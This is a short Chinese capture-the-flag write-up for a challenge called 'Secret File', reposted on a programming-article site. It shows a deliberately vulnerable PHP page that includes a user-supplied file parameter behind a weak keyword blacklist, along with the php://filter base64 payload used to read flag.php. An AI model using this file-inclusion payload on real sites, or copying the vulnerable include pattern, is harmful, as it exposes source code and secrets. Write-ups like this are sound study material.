Secret File

2021/7/16 23:37:40

编程Tag： 跳转 php base64 file Secret flag 尝试

本文主要是介绍Secret File，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

打开之后的界面是
在这里插入图片描述
审查元素之后有个跳转页面直接跳转然后

真狗继续跳转结果没看明白

尝试bp抓包试一下
发现有东西

看到代码进行分析

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

这里边有include 尝试伪协议找到flag.php

secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述
最后base64解码得到flag

这篇关于Secret File的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！

Secret File

相关编程文章